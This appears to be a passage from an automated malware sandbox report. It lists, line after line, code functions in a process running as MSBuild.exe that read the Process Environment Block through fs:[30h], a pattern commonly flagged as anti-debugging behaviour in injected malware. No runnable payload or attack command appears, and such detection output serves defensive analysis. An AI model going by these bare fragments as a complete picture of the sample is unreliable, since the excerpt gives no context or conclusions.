Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov ecx, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov ecx, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h] 10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0106D0C0 mov eax, dword ptr fs:[00000030h] 10_2_0106D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0106D0C0 mov eax, dword ptr fs:[00000030h] 10_2_0106D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEB136 mov eax, dword ptr fs:[00000030h] 10_2_00FEB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEB136 mov eax, dword ptr fs:[00000030h] 10_2_00FEB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEB136 mov eax, dword ptr fs:[00000030h] 10_2_00FEB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEB136 mov eax, dword ptr fs:[00000030h] 10_2_00FEB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF1131 mov eax, dword ptr fs:[00000030h] 10_2_00FF1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF1131 mov eax, dword ptr fs:[00000030h] 10_2_00FF1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C50D9 mov eax, dword ptr fs:[00000030h] 10_2_010C50D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010720DE mov eax, dword ptr fs:[00000030h] 10_2_010720DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010190DB mov eax, dword ptr fs:[00000030h] 10_2_010190DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010150E4 mov eax, dword ptr fs:[00000030h] 10_2_010150E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010150E4 mov ecx, dword ptr fs:[00000030h] 10_2_010150E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010760E0 mov eax, dword ptr fs:[00000030h] 10_2_010760E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010320F0 mov ecx, dword ptr fs:[00000030h] 10_2_010320F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE92FF mov eax, dword ptr fs:[00000030h] 10_2_00FE92FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102A30B mov eax, dword ptr fs:[00000030h] 10_2_0102A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102A30B mov eax, dword ptr fs:[00000030h] 10_2_0102A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102A30B mov eax, dword ptr fs:[00000030h] 10_2_0102A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107930B mov eax, dword ptr fs:[00000030h] 10_2_0107930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107930B mov eax, dword ptr fs:[00000030h] 10_2_0107930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107930B mov eax, dword ptr fs:[00000030h] 10_2_0107930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01010310 mov ecx, dword ptr fs:[00000030h] 10_2_01010310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B132D mov eax, dword ptr fs:[00000030h] 10_2_010B132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B132D mov eax, dword ptr fs:[00000030h] 10_2_010B132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101F32A mov eax, dword ptr fs:[00000030h] 10_2_0101F32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEB2D3 mov eax, dword ptr fs:[00000030h] 10_2_00FEB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEB2D3 mov eax, dword ptr fs:[00000030h] 10_2_00FEB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEB2D3 mov eax, dword ptr fs:[00000030h] 10_2_00FEB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF92C5 mov eax, dword ptr fs:[00000030h] 10_2_00FF92C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF92C5 mov eax, dword ptr fs:[00000030h] 10_2_00FF92C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFA2C3 mov eax, dword ptr fs:[00000030h] 10_2_00FFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFA2C3 mov eax, dword ptr fs:[00000030h] 10_2_00FFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFA2C3 mov eax, dword ptr fs:[00000030h] 10_2_00FFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFA2C3 mov eax, dword ptr fs:[00000030h] 10_2_00FFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFA2C3 mov eax, dword ptr fs:[00000030h] 10_2_00FFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C5341 mov eax, dword ptr fs:[00000030h] 10_2_010C5341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h] 10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BA352 mov eax, dword ptr fs:[00000030h] 10_2_010BA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107035C mov eax, dword ptr fs:[00000030h] 10_2_0107035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107035C mov eax, dword ptr fs:[00000030h] 10_2_0107035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107035C mov eax, dword ptr fs:[00000030h] 10_2_0107035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107035C mov ecx, dword ptr fs:[00000030h] 10_2_0107035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107035C mov eax, dword ptr fs:[00000030h] 10_2_0107035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107035C mov eax, dword ptr fs:[00000030h] 10_2_0107035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AF367 mov eax, dword ptr fs:[00000030h] 10_2_010AF367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109437C mov eax, dword ptr fs:[00000030h] 10_2_0109437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101438F mov eax, dword ptr fs:[00000030h] 10_2_0101438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101438F mov eax, dword ptr fs:[00000030h] 10_2_0101438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C539D mov eax, dword ptr fs:[00000030h] 10_2_010C539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE826B mov eax, dword ptr fs:[00000030h] 10_2_00FE826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0104739A mov eax, dword ptr fs:[00000030h] 10_2_0104739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0104739A mov eax, dword ptr fs:[00000030h] 10_2_0104739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF4260 mov eax, dword ptr fs:[00000030h] 10_2_00FF4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF4260 mov eax, dword ptr fs:[00000030h] 10_2_00FF4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF4260 mov eax, dword ptr fs:[00000030h] 10_2_00FF4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010233A0 mov eax, dword ptr fs:[00000030h] 10_2_010233A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010233A0 mov eax, dword ptr fs:[00000030h] 10_2_010233A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010133A5 mov eax, dword ptr fs:[00000030h] 10_2_010133A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF6259 mov eax, dword ptr fs:[00000030h] 10_2_00FF6259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEA250 mov eax, dword ptr fs:[00000030h] 10_2_00FEA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE9240 mov eax, dword ptr fs:[00000030h] 10_2_00FE9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE9240 mov eax, dword ptr fs:[00000030h] 10_2_00FE9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE823B mov eax, dword ptr fs:[00000030h] 10_2_00FE823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AC3CD mov eax, dword ptr fs:[00000030h] 10_2_010AC3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010763C0 mov eax, dword ptr fs:[00000030h] 10_2_010763C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AB3D0 mov ecx, dword ptr fs:[00000030h] 10_2_010AB3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h] 10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h] 10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h] 10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h] 10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h] 10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h] 10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h] 10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h] 10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AF3E6 mov eax, dword ptr fs:[00000030h] 10_2_010AF3E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C53FC mov eax, dword ptr fs:[00000030h] 10_2_010C53FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100E3F0 mov eax, dword ptr fs:[00000030h] 10_2_0100E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100E3F0 mov eax, dword ptr fs:[00000030h] 10_2_0100E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100E3F0 mov eax, dword ptr fs:[00000030h] 10_2_0100E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010263FF mov eax, dword ptr fs:[00000030h] 10_2_010263FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01027208 mov eax, dword ptr fs:[00000030h] 10_2_01027208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01027208 mov eax, dword ptr fs:[00000030h] 10_2_01027208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C5227 mov eax, dword ptr fs:[00000030h] 10_2_010C5227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_00FFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_00FFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_00FFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_00FFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_00FFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_00FFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF83C0 mov eax, dword ptr fs:[00000030h] 10_2_00FF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF83C0 mov eax, dword ptr fs:[00000030h] 10_2_00FF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF83C0 mov eax, dword ptr fs:[00000030h] 10_2_00FF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF83C0 mov eax, dword ptr fs:[00000030h] 10_2_00FF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01078243 mov eax, dword ptr fs:[00000030h] 10_2_01078243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01078243 mov ecx, dword ptr fs:[00000030h] 10_2_01078243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102724D mov eax, dword ptr fs:[00000030h] 10_2_0102724D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107D250 mov ecx, dword ptr fs:[00000030h] 10_2_0107D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AB256 mov eax, dword ptr fs:[00000030h] 10_2_010AB256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AB256 mov eax, dword ptr fs:[00000030h] 10_2_010AB256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BD26B mov eax, dword ptr fs:[00000030h] 10_2_010BD26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010BD26B mov eax, dword ptr fs:[00000030h] 10_2_010BD26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE8397 mov eax, dword ptr fs:[00000030h] 10_2_00FE8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE8397 mov eax, dword ptr fs:[00000030h] 10_2_00FE8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE8397 mov eax, dword ptr fs:[00000030h] 10_2_00FE8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01031270 mov eax, dword ptr fs:[00000030h] 10_2_01031270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01031270 mov eax, dword ptr fs:[00000030h] 10_2_01031270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01019274 mov eax, dword ptr fs:[00000030h] 10_2_01019274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEE388 mov eax, dword ptr fs:[00000030h] 10_2_00FEE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEE388 mov eax, dword ptr fs:[00000030h] 10_2_00FEE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEE388 mov eax, dword ptr fs:[00000030h] 10_2_00FEE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h] 10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h] 10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h] 10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h] 10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h] 10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h] 10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h] 10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h] 10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h] 10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h] 10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h] 10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h] 10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01070283 mov eax, dword ptr fs:[00000030h] 10_2_01070283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01070283 mov eax, dword ptr fs:[00000030h] 10_2_01070283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01070283 mov eax, dword ptr fs:[00000030h] 10_2_01070283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E284 mov eax, dword ptr fs:[00000030h] 10_2_0102E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E284 mov eax, dword ptr fs:[00000030h] 10_2_0102E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C5283 mov eax, dword ptr fs:[00000030h] 10_2_010C5283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF7370 mov eax, dword ptr fs:[00000030h] 10_2_00FF7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF7370 mov eax, dword ptr fs:[00000030h] 10_2_00FF7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF7370 mov eax, dword ptr fs:[00000030h] 10_2_00FF7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102329E mov eax, dword ptr fs:[00000030h] 10_2_0102329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102329E mov eax, dword ptr fs:[00000030h] 10_2_0102329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010052A0 mov eax, dword ptr fs:[00000030h] 10_2_010052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010052A0 mov eax, dword ptr fs:[00000030h] 10_2_010052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010052A0 mov eax, dword ptr fs:[00000030h] 10_2_010052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010052A0 mov eax, dword ptr fs:[00000030h] 10_2_010052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010872A0 mov eax, dword ptr fs:[00000030h] 10_2_010872A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010872A0 mov eax, dword ptr fs:[00000030h] 10_2_010872A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010862A0 mov eax, dword ptr fs:[00000030h] 10_2_010862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010862A0 mov ecx, dword ptr fs:[00000030h] 10_2_010862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010862A0 mov eax, dword ptr fs:[00000030h] 10_2_010862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010862A0 mov eax, dword ptr fs:[00000030h] 10_2_010862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010862A0 mov eax, dword ptr fs:[00000030h] 10_2_010862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010862A0 mov eax, dword ptr fs:[00000030h] 10_2_010862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE9353 mov eax, dword ptr fs:[00000030h] 10_2_00FE9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE9353 mov eax, dword ptr fs:[00000030h] 10_2_00FE9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B92A6 mov eax, dword ptr fs:[00000030h] 10_2_010B92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B92A6 mov eax, dword ptr fs:[00000030h] 10_2_010B92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B92A6 mov eax, dword ptr fs:[00000030h] 10_2_010B92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010B92A6 mov eax, dword ptr fs:[00000030h] 10_2_010B92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FED34C mov eax, dword ptr fs:[00000030h] 10_2_00FED34C
